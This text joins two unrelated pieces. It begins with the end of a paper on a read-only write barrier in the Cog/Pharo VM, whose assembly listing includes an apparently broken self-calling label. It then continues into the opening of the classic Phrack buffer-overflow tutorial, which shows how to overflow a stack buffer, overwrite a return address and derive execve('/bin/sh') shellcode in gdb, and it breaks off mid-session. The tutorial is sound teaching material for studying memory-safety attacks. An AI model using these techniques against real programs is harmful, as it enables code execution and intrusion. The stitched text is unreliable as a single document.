<tr> <td>popl %ecx</td> <td>Load the value to store in %ecx.</td> </tr>
<tr> <td>movl %ds:(%edx), %eax<br>testl 0x00800000, %eax<br>jnz store_trampoline</td> <td>If the receiver is read-only, jump to the shared store trampoline.</td> </tr>
<tr> <td>movl %ecx, %ds:0x8(%edx)</td> <td>Perform the store in the first instance variable.</td> </tr>
<tr> <td>testl 0x00000003, %ecx<br>jnz after_store</td> <td>If the value to store is immediate, jump after the store check.</td> </tr>
<tr> <td>movl 0x00040088, %eax<br>cmpl %eax, %edx<br>jb after_store</td> <td>If the receiver is a young object, jump after the store check.</td> </tr>
<tr> <td>cmpl %eax, %ecx<br>jnb after_store</td> <td>If the value to store is an old object, jump after the store check.</td> </tr>
<tr> <td>movzb %ds:0x3(%edx), %eax<br>testb 0x20, %al<br>jnz after_store</td> <td>If the receiver is already in the remembered table, jump after the store check.</td> </tr>
<tr> <td>store_trampoline:<br>call store_trampoline</td> <td>Call the shared store trampoline (reached from both the read-only check and the GC store check).</td> </tr>
<tr> <td>movl -12(%ebp), %edx</td> <td>Restore the receiver (to keep its register live).</td> </tr>
<tr> <td>after_store:</td> <td>Code following the store.</td> </tr>
</tbody>
</table>

**Figure 8.** Production lambda store with the write barrier

**Debugging support.** Without the write barrier, literal and instance variable stores are not interrupt points. The debugger cannot be opened at this program counter and processes cannot switch on variable stores.
With the write barrier, the cannotAssign:withIndex: call-back can create new stack frames. If one of the methods called opens a debugger, the programmer needs to be able to debug the context with the cannotAssign:withIndex: call-back and the sender of this context. I therefore needed to extend the machine code method metadata to be able to debug methods interrupted on stores.

**Compilation.** The write barrier was introduced as a compilation setting in the Cog virtual machine. By design, two choices were at hand: having the write barrier as a Slang-to-C compiler setting or as a C-to-machine-code compiler setting. I first made it a Slang compiler setting, but it was inconvenient as the build repository hierarchy needed to be duplicated to support the write barrier in all the builds. The write barrier was later changed to be a C compiler setting. The C compilation now has an extra setting, the (misleadingly named) -DIMMUTABILITY=1 flag, to compile the VM with the write barrier.

5. Evaluation

I evaluate first the memory overhead of the feature, then the execution time overhead.

5.1 Memory overhead

**Object representation.** As described in Section 2.4, each object requires a single bit to mark its read-only state. As all the objects need to be 64-bit aligned in the Spur memory manager and one bit had already been reserved for the write barrier, in practice there is no memory overhead at all.

**Machine code memory footprint evaluation.** The size of the machine code representation of methods matters a lot in the Cog VM. In fact, the VM keeps a fixed-size executable zone holding all the machine code of methods. This zone is allocated at start-up depending on an in-image setting; it is usually between 1 and 2 MB, but can be any value. The size of the machine code matters because:

- When installing a new method, the VM needs to scan the whole machine code zone and flush all the caches related to the new method's selector.
The machine code zone has to have a limited size to keep this scan from taking too long.

- Internally, the processor maps the frequently executed machine code into the CPU instruction cache. Having a limited machine code zone allows the CPU to have more instruction cache hits and improves the VM performance.
- As machine code versions of methods directly refer to objects (the literals are compiled inline in the machine code), the GC needs to scan the machine code zone to mark referenced objects. The size of the machine code zone matters as the GC needs to read the metadata associated with each machine code method to locate the referenced objects, so the bigger the zone is, the longer the GC takes.
- As the machine code zone has a fixed size, if methods are compiled to a smaller amount of machine code, the VM can fit more methods in the machine code zone before requiring a machine code zone garbage collection.

I evaluate the machine code size growth first globally, then locally.

**Machine code zone (globally).** As shown in Figure 9, just after start-up, the occupied machine code zone is 1.52% bigger with the write barrier than without. The overhead exists for multiple reasons:

- Each instance and literal variable store is compiled to more machine instructions for the read-only write barrier.
- The at:put: primitives are compiled with more instructions.
- Additional trampolines are required at the beginning of the machine code zone for the write barrier failures.

**Figure 9.** Machine code zone size

<table>
<thead>
<tr> <th></th> <th>Size after start-up (hex)</th> </tr>
</thead>
<tbody>
<tr> <td>Vanilla</td> <td>91C00</td> </tr>
<tr> <td>Write Barrier</td> <td>93F80</td> </tr>
</tbody>
</table>

**Locally: trampolines.** When comparing the first available address between the VM with and without the read-only write barrier, one notices an overhead of 400 bytes, which corresponds to the size of the new trampolines.
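The global figure can be checked directly from the table: the two sizes below are the hexadecimal values from Figure 9, and the 1.52% growth follows.

```python
# Machine code zone sizes just after start-up, from Figure 9 (hex).
vanilla_size = 0x91C00    # 596992 bytes
barrier_size = 0x93F80    # 606080 bytes

overhead_bytes = barrier_size - vanilla_size       # 9088 bytes
growth_percent = 100.0 * overhead_bytes / vanilla_size
# growth_percent is about 1.52, matching the percentage quoted above
```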
**Locally: per-store overhead.** In the case of a lambda store, the most common case, 12 extra bytes per store are needed to encode the extra machine instructions for the read-only check. The overhead may vary slightly, as the number of nops required for alignment between methods may change when the number of bytes of a method changes.

**Locally: at:put:.** Each at:put: primitive is 16 bytes bigger with the write barrier.

**Comments.** The main concern in our case is the number of literal and instance variable stores. The number of trampolines is fixed during execution and there are at most two at:put: primitives. Hence, only the number of stores can seriously impact the memory footprint. As the global evaluation showed, stores seem to be pretty rare, as the overall memory overhead is evaluated at 1.52%.

### 5.2 Execution time

**Benchmarks.** I evaluated the difference in performance using the Games benchmarks [7] that are normally used for VM performance evaluation. Even in benchmarks with intensive instance variable stores, such as the binary tree benchmark, the execution overhead was within the CPU noise (so little that it could not be evaluated). I believe there is some overhead in such benchmarks, but it is under 1% of execution time and I was not able to measure it.

**Building a pathological case.** To see the performance difference, I built a micro-benchmark around a pathological case doing almost only instance variable stores.

```plaintext
| guineaPig |
guineaPig := MicroBench new.
[ guineaPig setImmediate: 2 nonImmediate: #bar ] bench
```

**Figure 10.** Pathological benchmark code and results

<table>
<thead>
<tr> <th></th> <th>Time to run the pathological bench</th> </tr>
</thead>
<tbody>
<tr> <td>Vanilla</td> <td>11.5 ±3 nanoseconds per run</td> </tr>
<tr> <td>Write Barrier</td> <td>13.6 ±2 nanoseconds per run</td> </tr>
</tbody>
</table>

In this pathological case, as shown in Figure 10, one notices an 18.2% performance overhead.
However, the binary tree benchmark, which is larger, extensively calls a similar method (see Figure 11) and does not show any significant overhead. It is therefore unclear whether this result means anything for real applications.

**Figure 11.** Binary tree setter method

```plaintext
ShootoutTreeNode>>left: leftChild right: rightChild item: anItem
	left := leftChild.
	right := rightChild.
	item := anItem.
```

I profiled the pathological case and realized the performance overhead was mostly due to stack frame creation. Indeed, instance variable stores do not require a stack frame without the write barrier, but they do with the write barrier, to be able to perform the cannotAssign:withIndex: call-back. Different solutions are considered for this problem, as discussed in the future work section.

### 6. Related work

**Immutability.** Other programming languages such as Ada, C++, Java, Perl, Python, Javascript, Racket or Scala support immutable objects. In those languages, an immutable object is an object whose state cannot be modified after it is created. This differs from our approach, where at any time the program can mark or unmark an object as read-only. In the context of Smalltalk, where most features are reflective, it seems right to allow an object to change from immutable to mutable state, and the other way around, using reflective APIs.

**Garbage collector write barrier.** Other people have implemented write barriers in the machine code for efficient garbage collection [9, 10]. Tracing generational GCs require the runtime to maintain a specific invariant: objects referencing other objects from a younger generation need to be remembered. This way, the runtime can mark a generation of objects without scanning older generations, leading to better performance. In this kind of GC, when an object is stored into an older object, some actions may be taken by the runtime to remember the old object, thanks to a write barrier.
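The generational invariant just described can be sketched in a few lines. This is a hypothetical Python model, not VM code: young/old is a flag and the remembered table is a set of object identities, whereas real VMs compare addresses against a young-space limit, as in Figure 6.

```python
# Sketch of a generational GC write barrier: storing a young object
# into an old object records the old object in the remembered table,
# so the young generation can be traced without scanning old space.
class HeapObject:
    def __init__(self, young, num_slots=2):
        self.young = young
        self.slots = [None] * num_slots

remembered_table = set()

def store_with_barrier(holder, index, value):
    holder.slots[index] = value
    # Only an old object now referencing a young object needs to be
    # remembered; immediates (plain ints here) never trigger it.
    if (not holder.young
            and isinstance(value, HeapObject)
            and value.young):
        remembered_table.add(id(holder))
```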
In addition, many modern GCs are also incremental, to limit the impact of garbage collection pauses on the application. Incremental GCs may require additional invariants. For example, in a tri-color marking garbage collector [1], an additional invariant is that black and white objects cannot reference each other. In the case of the Cog VM, the runtime now provides a write barrier both for the generational GC and for read-only objects. As discussed in Section 4.3.2, part of the machine code is shared between both write barriers to limit the overhead. As of today, the Cog VM does not feature an incremental GC, hence no write barrier is required for this purpose.

**High level modification tracker tools.** The main use-case of the write barrier is the implementation of object modification trackers. Other implementations of object modification trackers are available. The most popular nowadays are the ones built with the Reflectivity framework [5]. In contrast to our approach, where the overhead is close to zero, the other available approaches have a significant overhead, as they need to execute additional bytecodes.

**Other Smalltalks.** Other Smalltalk dialects, such as VisualWorks Smalltalk and the HPS VM (High Performance Smalltalk Virtual Machine) [6], have similar features. In the case of VisualWorks, as the VM is a pure-JIT VM (there is no interpreter), the implementation does not require the cannotAssign:withIndex: call-back to return no value (the machine code generated has a specific execution path to take care of it).

### 7. Future Work

I discuss in this section multiple performance improvements and features that would be nice to have in future releases of the Cog VM.

#### 7.1 Performance improvements

**Stack frame mapping and trampolines.** While profiling VM code to look for methods getting slower with the write barrier, it came to light that one could optimize multiple trampolines in the JIT (related and unrelated to read-only objects).
Indeed, trampolines such as cannotAssign:withIndex: or mustBeBoolean⁵ add strong pressure on register allocation while they are taken infrequently. It would be possible to convert stack frames triggering those trampolines from machine code frames to bytecode interpreter frames lazily, only when one of the infrequent trampolines is taken. This way, infrequent execution paths would be interpreted, leading to overhead only in rare cases, while the common execution path could be optimized better.

**Stack frame creation for setters.** As discussed in Section 5.2, the main remaining slow-down in the current implementation lies with setter methods, *i.e.*, methods only setting the value of one or multiple instance variables. It is possible to change the JIT to generate two paths for such methods. The method would start by testing whether the receiver is read-only; if it is not, which is the most common case, a quick path without stack frame creation nor read-only checks could be taken instead of the slow path with stack frame creation and read-only checks.

#### 7.2 Features

**Read-only contexts.** For simplicity, I enforced all contexts to be writable. It would be interesting to allow contexts to be read-only, though it is not clear what the use-cases would be. Read-only contexts cannot be executed by the existing VM, as code execution requires at least the mutation of the context's program counter. Hence, such contexts would not be mapped to stack frames and would only exist as normal objects. Execution returning to a read-only context would fail, and Smalltalk code would be able to handle the failure. The only way such contexts could be executed is through a separate runtime directly written by the programmer to correctly execute the code. Work in that direction will happen if someone provides a valid use-case.

**Modification tracker.** One of the main use-cases of the write barrier is to track object modifications.
To do so, one has to implement an in-image framework on top of the write barrier APIs proposed in this paper. The framework has to correctly handle store failures both of primitives such as at:put: and of instance variable stores.

**In-image primitive fall-back.** As stated in Section 3.2, all the primitive methods mutating an object need to have their fall-back code updated to raise the correct error. If such primitives fail because of a read-only object, the primitive failure error should be appropriate, not an unrelated error. This still has to be done.

### 8. Conclusion

In this paper I have described the implementation of the write barrier in the Cog VM and the Pharo image. According to the multiple evaluations, the feature was introduced with little to no overhead in terms of memory footprint and execution time in most applications. Although the overhead is minimal, very uncommon pathological cases still show an execution time overhead of up to 18.2%. I believe the pathological-case overhead could be solved by compiling two paths for setter methods and by falling back to bytecode interpretation on uncommon machine code paths. Hopefully, once polished over months of production and customer feedback, the write barrier will induce a negligible overhead even in uncommon cases.

Acknowledgements

I thank Eliot Miranda for helping me implement the write barrier in the Cog VM and reviewing all my commits. I thank Colin Putney for clarifying the term immutability versus write barrier and for discussing the implementation in general, as well as Tobias Pape, Jan Van de Sandt, Ryan Macnak, Tudor Girba, Chris Cunningham, Tim Rowledge, Ben Coman, Bert Freudenberg and Denis Kudriashov on the Squeak virtual machine mailing list.

---

⁵ These trampolines require specific registers to hold specific values to be called and forbid other registers to stay alive across the trampoline calls.
This work was supported by the Ministry of Higher Education and Research, the Nord-Pas de Calais Regional Council, and CPER Nord-Pas de Calais/FEDER DATA Advanced data science and technologies 2015-2020.

References
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-01356338/file/HAL.pdf", "len_cl100k_base": 10103, "olmocr-version": "0.1.47", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 33814, "total-output-tokens": 10792, "length": "2e13", "weborganizer": {"__label__adult": 0.0003008842468261719, "__label__art_design": 0.0002276897430419922, "__label__crime_law": 0.0002130270004272461, "__label__education_jobs": 0.00031495094299316406, "__label__entertainment": 4.875659942626953e-05, "__label__fashion_beauty": 0.00011855363845825197, "__label__finance_business": 0.00014829635620117188, "__label__food_dining": 0.00027489662170410156, "__label__games": 0.0003902912139892578, "__label__hardware": 0.000957489013671875, "__label__health": 0.00031685829162597656, "__label__history": 0.00018930435180664065, "__label__home_hobbies": 6.979703903198242e-05, "__label__industrial": 0.00029850006103515625, "__label__literature": 0.00018310546875, "__label__politics": 0.00021135807037353516, "__label__religion": 0.00039267539978027344, "__label__science_tech": 0.008758544921875, "__label__social_life": 6.389617919921875e-05, "__label__software": 0.00437164306640625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.0002390146255493164, "__label__transportation": 0.00040221214294433594, "__label__travel": 0.00016868114471435547}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47045, 0.02101]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47045, 0.61974]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47045, 0.89144]], "google_gemma-3-12b-it_contains_pii": [[0, 970, false], [970, 4711, null], [4711, 10259, null], [10259, 14521, null], [14521, 19107, null], [19107, 24443, null], [24443, 28953, null], [28953, 34311, null], [34311, 38606, null], [38606, 44187, null], [44187, 47045, null]], 
"google_gemma-3-12b-it_is_public_document": [[0, 970, true], [970, 4711, null], [4711, 10259, null], [10259, 14521, null], [14521, 19107, null], [19107, 24443, null], [24443, 28953, null], [28953, 34311, null], [34311, 38606, null], [38606, 44187, null], [44187, 47045, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47045, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47045, null]], "pdf_page_numbers": [[0, 970, 1], [970, 4711, 2], [4711, 10259, 3], [10259, 14521, 4], [14521, 19107, 5], [19107, 24443, 6], [24443, 28953, 7], [28953, 34311, 8], [34311, 38606, 9], [38606, 44187, 10], [44187, 47045, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47045, 0.19322]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
c3186ec3f19b11eac5280a42994bbe8ce433a177
SMASHING THE STACK FOR FUN AND PROFIT

by Aleph One <aleph1@underground.org>
published in Phrack Volume 7, Issue 49, File 14 of 16

`smash the stack` [C programming] n. On many C implementations it is possible to corrupt the execution stack by writing past the end of an array declared auto in a routine. Code that does this is said to smash the stack, and can cause return from the routine to jump to a random address. This can produce some of the most insidious data-dependent bugs known to mankind. Variants include trash the stack, scribble the stack, mangle the stack; the term mung the stack is not used, as this is never done intentionally. See spam; see also alias bug, fandango on core, memory leak, precedence lossage, overrun screw.

**INTRODUCTION**

Over the last few months there has been a large increase of buffer overflow vulnerabilities being both discovered and exploited. Examples of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt library, at, etc. This paper attempts to explain what buffer overflows are, and how their exploits work. Basic knowledge of assembly is required. An understanding of virtual memory concepts, and experience with gdb are very helpful but not necessary. We also assume we are working with an Intel x86 CPU, and that the operating system is Linux.
Some basic definitions before we begin: A buffer is simply a contiguous block of computer memory that holds multiple instances of the same data type. C programmers normally associate the word buffer with arrays, most commonly character arrays. Arrays, like all variables in C, can be declared either static or dynamic. Static variables are allocated at load time on the data segment. Dynamic variables are allocated at run time on the stack. To overflow is to flow, or fill over the top, brims, or bounds. We will concern ourselves only with the overflow of dynamic buffers, otherwise known as stack-based buffer overflows.

**PROCESS MEMORY ORGANIZATION**

To understand what stack buffers are we must first understand how a process is organized in memory. Processes are divided into three regions: Text, Data, and Stack. We will concentrate on the stack region, but first a small overview of the other regions is in order.

The text region is fixed by the program and includes code (instructions) and read-only data. This region corresponds to the text section of the executable file. This region is normally marked read-only and any attempt to write to it will result in a segmentation violation.

The data region contains initialized and uninitialized data. Static variables are stored in this region. The data region corresponds to the data-bss sections of the executable file. Its size can be changed with the brk(2) system call. If the expansion of the bss data or the user stack exhausts available memory, the process is blocked and is rescheduled to run again with a larger memory space. New memory is added between the data and stack segments.

```
                /------------------\  lower
                |                  |  memory
                |       Text       |  addresses
                |                  |
                |------------------|
                |   (Initialized)  |
                |       Data       |
                |  (Uninitialized) |
                |------------------|
                |                  |
                |      Stack       |  higher
                |                  |  memory
                \------------------/  addresses

           Fig. 1 Process Memory Regions
```

**WHAT IS A STACK?**

A stack is an abstract data type frequently used in computer science. A stack of objects has the property that the last object placed on the stack will be the first object removed.
This property is commonly referred to as last in, first out, or LIFO.

Several operations are defined on stacks. Two of the most important are PUSH and POP. PUSH adds an element at the top of the stack. POP, in contrast, reduces the stack size by one by removing the last element at the top of the stack.

**WHY DO WE USE A STACK?**

Modern computers are designed with the need of high-level languages in mind. The most important technique for structuring programs introduced by high-level languages is the procedure or function. From one point of view, a procedure call alters the flow of control just as a jump does, but unlike a jump, when finished performing its task, a function returns control to the statement or instruction following the call. This high-level abstraction is implemented with the help of the stack. The stack is also used to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function.

**THE STACK REGION**

A stack is a contiguous block of memory containing data. A register called the stack pointer (SP) points to the top of the stack. The bottom of the stack is at a fixed address. Its size is dynamically adjusted by the kernel at run time. The CPU implements instructions to PUSH onto and POP off of the stack.

The stack consists of logical stack frames that are pushed when calling a function and popped when returning. A stack frame contains the parameters to a function, its local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call.

Depending on the implementation the stack will either grow down (towards lower memory addresses), or up. In our examples we'll use a stack that grows down. This is the way the stack grows on many computers including the Intel, Motorola, SPARC and MIPS processors. The stack pointer (SP) is also implementation dependent.
It may point to the last address on the stack, or to the next free available address after the stack. For our discussion we'll assume it points to the last address on the stack.

In addition to the stack pointer, which points to the top of the stack (lowest numerical address), it is often convenient to have a frame pointer (FP) which points to a fixed location within a frame. Some texts also refer to it as a local base pointer (LB). In principle, local variables could be referenced by giving their offsets from SP. However, as words are pushed onto the stack and popped from the stack, these offsets change. Although in some cases the compiler can keep track of the number of words on the stack and thus correct the offsets, in some cases it cannot, and in all cases considerable administration is required. Furthermore, on some machines, such as Intel-based processors, accessing a variable at a known distance from SP requires multiple instructions.

Consequently, many compilers use a second register, FP, for referencing both local variables and parameters because their distances from FP do not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this purpose. On the Motorola CPUs, any address register except A7 (the stack pointer) will do. Because of the way our stack grows, actual parameters have positive offsets and local variables have negative offsets from FP.

The first thing a procedure must do when called is save the previous FP (so it can be restored at procedure exit). Then it copies SP into FP to create the new FP, and advances SP to reserve space for the local variables. This code is called the procedure prolog. Upon procedure exit, the stack must be cleaned up again, something called the procedure epilog. The Intel ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions have been provided to do most of the procedure prolog and epilog work efficiently.
Let us see what the stack looks like in a simple example:

example1.c:

```c
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
}

void main() {
  function(1,2,3);
}
```

To understand what the program does to call function() we compile it with gcc using the -S switch to generate assembly code output:

```
$ gcc -S -o example1.s example1.c
```

By looking at the assembly language output we see that the call to function() is translated to:

```
        pushl $3
        pushl $2
        pushl $1
        call function
```

This pushes the 3 arguments to function backwards into the stack, and calls function(). The instruction 'call' will push the instruction pointer (IP) onto the stack. We'll call the saved IP the return address (RET). The first thing done in function is the procedure prolog:

```
        pushl %ebp
        movl %esp,%ebp
        subl $20,%esp
```

This pushes EBP, the frame pointer, onto the stack. It then copies the current SP onto EBP, making it the new FP pointer. We'll call the saved FP pointer SFP. It then allocates space for the local variables by subtracting their size from SP.

We must remember that memory can only be addressed in multiples of the word size. A word in our case is 4 bytes, or 32 bits. So our 5 byte buffer is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer is going to take 12 bytes (3 words) of memory. That is why SP is being subtracted by 20. With that in mind our stack looks like this when function() is called (each space represents a byte):

```
bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                stack
```

**BUFFER OVERFLOW**

A buffer overflow is the result of stuffing more data into a buffer than it can handle. How can this often-found programming error be taken advantage of to execute arbitrary code?
Let's look at another example:

example2.c:

```c
void function(char *str) {
   char buffer[16];

   strcpy(buffer,str);
}

void main() {
  char large_string[256];
  int i;

  for( i = 0; i < 255; i++)
    large_string[i] = 'A';

  function(large_string);
}
```

This program has a function with a typical buffer overflow coding error. The function copies a supplied string without bounds checking by using `strcpy()` instead of `strncpy()`. If you run this program you will get a segmentation violation. Let's see what its stack looks like when we call function:

```
bottom of                                                            top of
memory                                                               memory
                buffer            sfp   ret   *str
<------        [                ][    ][    ][    ]

top of                                                            bottom of
stack                                                                stack
```

What is going on here? Why do we get a segmentation violation? Simple. strcpy() is copying the contents of *str (large_string[]) into buffer[] until a null character is found in the string. As we can see buffer[] is much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff it with 256 bytes. This means that all 240 bytes after buffer in the stack are being overwritten. This includes the SFP, RET, and even *str! We had filled large_string with the character 'A'. Its hex value is 0x41. That means that the return address is now 0x41414141. This is outside of the process address space. That is why when the function returns and tries to read the next instruction from that address you get a segmentation violation.

So a buffer overflow allows us to change the return address of a function. In this way we can change the flow of execution of the program. Let's go back to our first example and recall what the stack looked like:

```
bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                stack
```

Let's try to modify our first example so that it overwrites the return address, and demonstrate how we can make it execute arbitrary code. Just before buffer1[] on the stack is SFP, and before it, the return address. That is 4 bytes past the end of buffer1[].
But remember that buffer1[] is really 2 words, so it's 8 bytes long. So the return address is 12 bytes from the start of buffer1[]. We'll modify the return value in such a way that the assignment statement 'x = 1;' after the function call will be skipped. To do so we add 8 bytes to the return address. Our code is now:

example3.c:

```
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
```

What we have done is add 12 to buffer1[]'s address. This new address is where the return address is stored. We want to skip past the assignment to the printf call. How did we know to add 8 to the return address? We used a test value first (for example 1), compiled the program, and then started gdb:

```
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
```
```
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>:       pushl  %ebp
0x8000491 <main+1>:     movl   %esp,%ebp
0x8000493 <main+3>:     subl   $0x4,%esp
0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x800049d <main+13>:    pushl  $0x3
0x800049f <main+15>:    pushl  $0x2
0x80004a1 <main+17>:    pushl  $0x1
0x80004a3 <main+19>:    call   0x8000470 <function>
0x80004a8 <main+24>:    addl   $0xc,%esp
0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
0x80004b5 <main+37>:    pushl  %eax
0x80004b6 <main+38>:    pushl  $0x80004f8
0x80004bb <main+43>:    call   0x8000378 <printf>
0x80004c0 <main+48>:    addl   $0x8,%esp
0x80004c3 <main+51>:    movl   %ebp,%esp
0x80004c5 <main+53>:    popl   %ebp
0x80004c6 <main+54>:    ret
0x80004c7 <main+55>:    nop
```

We can see that when calling function() the RET will be 0x80004a8, and we want to jump past the assignment at 0x80004ab. The next instruction we want to execute is at 0x80004b2. A little math tells us the distance is 8 bytes.

**SHELL CODE**

So now that we know that we can modify the return address and the flow of execution, what program do we want to execute? In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish. But what if there is no such code in the program we are trying to exploit? How can we place arbitrary instructions into its address space? The answer is to place the code we are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer. Assuming the stack starts at address 0xFF, and that S stands for the code we want to execute, the stack would then look like this:

```
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF  top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF  memory
           buffer                sfp   ret   a     b     c
<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|

top of                                                         bottom of
stack                                                              stack
```

The code to spawn a shell in C looks like:

```c
#include <stdio.h>

void main() {
  char *name[2];

  name[0] = "/bin/sh";
  name[1] = NULL;
  execve(name[0], name, NULL);
}
```

To find out what it looks like in assembly we compile it, and start up gdb. Remember to use the `-static` flag.
Otherwise the actual code for the `execve` system call will not be included. Instead there will be a reference to the dynamic C library that would normally be linked in at load time.

```
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl  $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl  %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl  %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
```

Let's try to understand what is going on here. We'll start by studying main:

```
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
```

This is the procedure prelude. It first saves the old frame pointer, makes the current stack pointer the new frame pointer, and leaves space for the local variables. In this case it's:

```
char *name[2];
```

or 2 pointers to a char. Pointers are a word long, so it leaves space for two words (8 bytes).

```
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
```

We copy the value 0x80027b8 (the address of the string "/bin/sh") into the first pointer of name[]. This is equivalent to:

```
name[0] = "/bin/sh";
```

```
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
```

We copy the value 0x0 (NULL) into the second pointer of name[]. This is equivalent to:

```
name[1] = NULL;
```

The actual call to execve() starts here.

```
0x8000144 <main+20>:    pushl  $0x0
```

We push the arguments to execve() in reverse order onto the stack. We start with NULL.

```
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
```

We load the address of name[] into the EAX register.

```
0x8000149 <main+25>:    pushl  %eax
```

We push the address of name[] onto the stack.
```
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
```

We load the address of the string "/bin/sh" into the EAX register.

```
0x800014d <main+29>:    pushl  %eax
```

We push the address of the string "/bin/sh" onto the stack.

```
0x800014e <main+30>:    call   0x80002bc <__execve>
```

Call the library procedure execve(). The call instruction pushes the IP onto the stack.

Now execve(). Keep in mind we are using an Intel-based Linux system. The syscall details will change from OS to OS, and from CPU to CPU. Some will pass the arguments on the stack, others on the registers. Some use a software interrupt to jump to kernel mode, others use a far call. Linux passes its arguments to the system call on the registers, and uses a software interrupt to jump into kernel mode.

```
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
```

The procedure prelude.

```
0x80002c0 <__execve+4>: movl   $0xb,%eax
```

Copy 0xb (11 decimal) into the EAX register. This is the index into the syscall table. 11 is execve.

```
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
```

Copy the address of "/bin/sh" into EBX.

```
0x80002c8 <__execve+12>: movl  0xc(%ebp),%ecx
```

Copy the address of name[] into ECX.

```
0x80002cb <__execve+15>: movl  0x10(%ebp),%edx
```

Copy the address of the null pointer into %edx.

```
0x80002ce <__execve+18>: int   $0x80
```

Change into kernel mode.

So as we can see there is not much to the execve() system call. All we need to do is:

a. Have the null terminated string "/bin/sh" somewhere in memory.
b. Have the address of the string "/bin/sh" somewhere in memory followed by a null long word.
c. Copy 0xb into the EAX register.
d. Copy the address of the string "/bin/sh" into the EBX register.
e. Copy the address of the address of the string "/bin/sh" into the ECX register.
f. Copy the address of the null long word into the EDX register.
g. Execute the int $0x80 instruction.

But what if the execve() call fails for some reason?
The program will continue fetching instructions from the stack, which may contain random data! The program will most likely core dump. We want the program to exit cleanly if the execve syscall fails. To accomplish this we must then add an exit syscall after the execve syscall. What does the exit syscall look like?

exit.c:

```c
#include <stdlib.h>

void main() {
  exit(0);
}
```

```
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
